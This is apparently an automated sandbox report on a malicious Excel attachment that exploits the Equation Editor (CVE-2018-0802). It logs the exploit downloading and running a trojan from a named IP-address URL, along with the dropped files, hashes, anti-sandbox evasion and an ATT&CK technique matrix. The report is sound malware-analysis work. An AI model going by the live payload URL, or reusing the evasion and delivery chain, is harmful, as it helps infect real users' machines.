    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V4.2\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\AsSQLHelper.pdb source: AsSQLHelper.dll.4.dr
    Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIINVHelper.pdb source: AEGISIIINVHelper.dll.4.dr

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000004.00000002.1176745536.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exeCode function: 4_2_708A30C0 push eax; ret
    Source: wxbase30u_xml_gcc_custom.dll.4.drStatic PE information: section name: .xdata
    Source: C:\Users\Public\vbc.exeCode function: 4_2_708A1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\AsSQLHelper.dllJump to dropped file
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nszEA61.tmp\System.dllJump to dropped file
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dllJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exeJump to dropped file
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dllJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0342056E LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

    Boot Survival

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000003A6116E second address: 0000000003A6116E instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FCA090E82A3h 0x00000006 cmp cx, 133Bh 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d cmp al, E6h 0x0000000f rdtsc
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 852Thread sleep time: -360000s >= -30000s
    Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AsSQLHelper.dllJump to dropped file
    Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dllJump to dropped file
    Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dllJump to dropped file
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00406850 FindFirstFileW,FindClose,
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040290B FindFirstFileW,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end node
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end node
    Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end node
    Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end node
    Source: vbc.exe, 00000004.00000002.1176666558.00000000009EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
    Source: C:\Users\Public\vbc.exeCode function: 4_2_708A1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03420677 mov edx, dword ptr fs:[00000030h]
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Scripting
    Path Interception1
    Access Token Manipulation
    111
    Masquerading
    OS Credential Dumping11
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    System Shutdown/Reboot
    Default Accounts1
    Native API
    Boot or Logon Initialization Scripts11
    Process Injection
    1
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Virtualization/Sandbox Evasion
    Remote Desktop Protocol1
    Clipboard Data
    Exfiltration Over Bluetooth33
    Ingress Tool Transfer
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts22
    Exploitation for Client Execution
    Logon Script (Windows)1
    Extra Window Memory Injection
    1
    Access Token Manipulation
    Security Account Manager1
    Remote System Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
    Non-Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
    Process Injection
    NTDS2
    File and Directory Discovery
    Distributed Component Object ModelInput CaptureScheduled Transfer121
    Application Layer Protocol
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    Scripting
    LSA Secrets15
    System Information Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common1
    Obfuscated Files or Information
    Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
    Extra Window Memory Injection
    DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    OR17233976_00019489_20170619154218.xlsx41%VirustotalBrowse
    OR17233976_00019489_20170619154218.xlsx24%ReversingLabsDocument-OLE.Exploit.CVE-2018-0802
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe15%ReversingLabsWin32.Trojan.Shelsy
    C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nszEA61.tmp\System.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\nszEA61.tmp\System.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dll0%ReversingLabs
    C:\Users\Public\vbc.exe15%ReversingLabsWin32.Trojan.Shelsy
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://ocsp2.globals)0%Avira URL Cloudsafe
    http://103.149.13.182/365space/.svchost.exej0%Avira URL Cloudsafe
    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
    http://103.149.13.182/365space/.svchost.exe4%VirustotalBrowse
    http://103.149.13.182/365space/.svchost.exe100%Avira URL Cloudmalware
    http://103.149.13.182/365space/.svchost.exemmC:0%Avira URL Cloudsafe
    http://ocsp.sectigo.com00%URL Reputationsafe
    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
    http://crl.globalsig0%Avira URL Cloudsafe
    https://www.globalsign.90%Avira URL Cloudsafe
    https://sectigo.com/CPS0C0%URL Reputationsafe
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://103.149.13.182/365space/.svchost.exetrue
    • 4%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://ocsp2.globals)EQNEDT32.EXE, 00000002.00000002.972173687.00000000006B1000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    low
    http://103.149.13.182/365space/.svchost.exejEQNEDT32.EXE, 00000002.00000002.973889166.0000000003420000.00000004.00000800.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    unknown
    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0svbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.drfalse
    • URL Reputation: safe
    unknown
    http://103.149.13.182/365space/.svchost.exemmC:EQNEDT32.EXE, 00000002.00000002.971735637.0000000000664000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    unknown
    http://nsis.sf.net/NSIS_ErrorErrorvbc.exe, 00000004.00000000.969965123.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000002.1176452278.000000000040A000.00000004.00000001.01000000.00000004.sdmp, .svchost[1].exe.2.dr, vbc.exe.2.drfalse
      high
      http://ocsp.sectigo.com0vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.drfalse
      • URL Reputation: safe
      unknown
      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.drfalse
      • URL Reputation: safe
      unknown
      http://crl.globalsigEQNEDT32.EXE, 00000002.00000002.972173687.00000000006B1000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://www.globalsign.9EQNEDT32.EXE, 00000002.00000002.972173687.00000000006B1000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      low
      https://sectigo.com/CPS0Cvbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.drfalse
      • URL Reputation: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      103.149.13.182
      unknownunknown
      135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue
      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:623901
      Start date and time: 10/05/202222:15:362022-05-10 22:15:36 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 46s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:OR17233976_00019489_20170619154218.xlsx
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:5
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.troj.expl.evad.winXLSX@4/26@0/1
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 63.2% (good quality ratio 62%)
      • Quality average: 88.5%
      • Quality standard deviation: 21.3%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .xlsx
      • Adjust boot time
      • Enable AMSI
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      • Exclude process from analysis (whitelisted): dllhost.exe
      • TCP Packets have been reduced to 100
      • Report size getting too big, too many NtCreateFile calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      TimeTypeDescription
      22:16:45API Interceptor96x Sleep call for process: EQNEDT32.EXE modified
      No context
      No context
      No context
      No context
      No context
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
      Category:downloaded
      Size (bytes):334840
      Entropy (8bit):7.5515570562738015
      Encrypted:false
      SSDEEP:6144:03yztyL/0/bbdat6J9mOnuuogo+aBhAYpAhX0vsMfwUrJrnBpKussJ9LQs3:03pL0/bbdat6JIO1RgBhAY4cPf3BnB3Z
      MD5:78003B1DD8F6229A23A13087082E259C
      SHA1:8A9998FEAE97C83883C682457E06E01A5F49C28A
      SHA-256:784D3F82BACA5B823EE950DF8A640E1D5A1C1EE75B78A3C26ABDA15A99A204F3
      SHA-512:36DE0D01ADAC20F81A5A9B1248239723CD77D93A60F12487E99F3DE7981ACB91CBD780F0D78705862882996A60057D3FCD3BEC3929718E72A6201795382CA6F0
      Malicious:true
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 15%
      Reputation:low
      IE Cache URL:http://103.149.13.182/365space/.svchost.exe
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L...h.Oa.................h....:......5............@...........................>...........@..........................................`=..Y..............0 ...........................................................................................text...pf.......h.................. ..`.rdata...............l..............@..@.data...x.9.........................@....ndata........:..........................rsrc....Y...`=..Z..................@..@................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):11303
      Entropy (8bit):7.909402464702408
      Encrypted:false
      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
      Malicious:false
      Reputation:high, very likely benign file
      Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:ms-windows metafont .wmf
      Category:dropped
      Size (bytes):8296
      Entropy (8bit):4.968794104149249
      Encrypted:false
      SSDEEP:192:1UD/eVx/xqAGlAoVo5kGtJvGOJsdHtf0jVTdfnnUj8GErUsRgvo/aRzutTkpNn8O:1UD/e3JqplAoVoeovGOadN8jVTdfnnsZ
      MD5:A549AA7F97898B261149683461DAA5B3
      SHA1:23FC6A9681D1EC42968FA9B7FDC3A39704D9A5A8
      SHA-256:0D8148A90146940BDEA33C016EF7472F2A2A98DC81B93642B3C0BE96F556CCDB
      SHA-512:8C341C222FCDBB3EC5E0FF672C2FF0B6947B297A587D5F6C5AA638691072F46B2F37627E3B9B5689F7A91203ADFE5069FE9ECC97C2AB6DCE9E69A22ADC121803
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview:....................R......)...........................C.....................-...................".....-...........................".....-.....................-...............$...V...............V.....................-...............-.......-.....................-...............$.n.........b...9.......................k...R...=...+.........}...v...u. ...:...Y...z.-...D...U..._...d.0.e.Q.c.p._...Y...S...N...J...H...H...H...H...I.....G...6...&.................{...`...E...>...7...0...)...(...&...#.............u...e...V...G...9...+.......................................................{...n...`...R...D...7...).......................d...I...2.....q...Y...>... ...................W...&...............................G.........-...............-.......-.....................-...............$..._.@...+...b._.@.....-...............-.......-.....................-...........B...$...&...%..."........./...B...T...e...u.........................q...\...Z...W...R...L...E...<.-.2.<.'.K.C...#...$...%...&...
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):10202
      Entropy (8bit):7.870143202588524
      Encrypted:false
      SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
      MD5:66EF10508ED9AE9871D59F267FBE15AA
      SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
      SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
      SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
      Malicious:false
      Reputation:high, very likely benign file
      Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):1099960
      Entropy (8bit):2.015159233592395
      Encrypted:false
      SSDEEP:3072:bXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:BahIFdyiaT2qtXl
      MD5:E780029FC510263ADBCDCB722EE175DB
      SHA1:DBB31FE31A18F06E033C87CAAAEAB6B5447FDECB
      SHA-256:B3D61080037707B77D1F08BEA2B282E985D0D186B8E6B743B3141E590AC2875D
      SHA-512:E34571DE1790FFC6C3AFD831BA3DF89E80D828F90DBFC2E23019D5EA5D1919E2993AB25AD338B1E7445C80265661119F795FEF6E49F1705A65D1D26EA683D479
      Malicious:false
      Preview:....l...............C...........m>..?$.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................x$........f.x.@..%.......(...............RQ.P................p...$Q.P........ ...Id.x........ .........&..d.x............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...............X............8.x......&.dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....C.......L.......................P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 150x150, frames 3
      Category:dropped
      Size (bytes):4422
      Entropy (8bit):7.85119455039558
      Encrypted:false
      SSDEEP:96:xtrSkbtlIH8DNo0d/xK0xPJEd+jmoOVKW1wVwUrhEmJzUcSZFMYrZvn:xt9taINo4pXxA9x1XUtEmUXFMo
      MD5:C96C0C48B8618E6C3900BA7A247F8CBA
      SHA1:F26FAC99A47B00164D9B57FB24904F9E29777229
      SHA-256:8F82582426E79EC967B238F609F485DAB0AB8C7C4CB14BF9B40050D33C42E782
      SHA-512:0CB9B7BC028A61CF4D2A06A735E45F9786DCC4D310F61E1D8A80E2F35D4D998BCF85CDD30998A1A903D329A90ACD819D678DF693106897ACE6B65EDFC0F7C968
      Malicious:false
      Preview:......JFIF...................................................!........'.."#%%%..),($+!$%$...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$......................3................................................................PU.....l.)}..]..<.T.)...s<.)i-.:.....D\...D.y.ri<.........}..0d..x."h.9gWY...m..y....>}.w...s...p0|..OB.......@..p0T...$.B..a..L(.#.h..l.........M..#&K.`.S......$.L6 ...`.40]....K+MKB.....:@5=)......8..y....VO.........K@`.&.&...jd.d.....<.q.......... ...<....\.m]..pE0w7#.OB..........r..zP`.:..L. .2`.O.........................7............................S..2T !1Q.#5A.&3.$%6CDPRc............p.|.3......q..c.4....VHW..:{y...UK9d-|T_...]O..a........H..e(Z.c.`.. E..W..D.....\....t.O.r...=..U...pj...@E...+.+...W ..W1.....d..?L1R..S.V.V...J...u.Z....@......U*m...Y...._.d.......EDB..(*..D:......`.......3...&..../..W.HdaGm.[......gZF.7_/....{..../....n.6.+...=..H..N.....;...`I...`mk^.......................q.......W...~..
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):11303
      Entropy (8bit):7.909402464702408
      Encrypted:false
      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
      Malicious:false
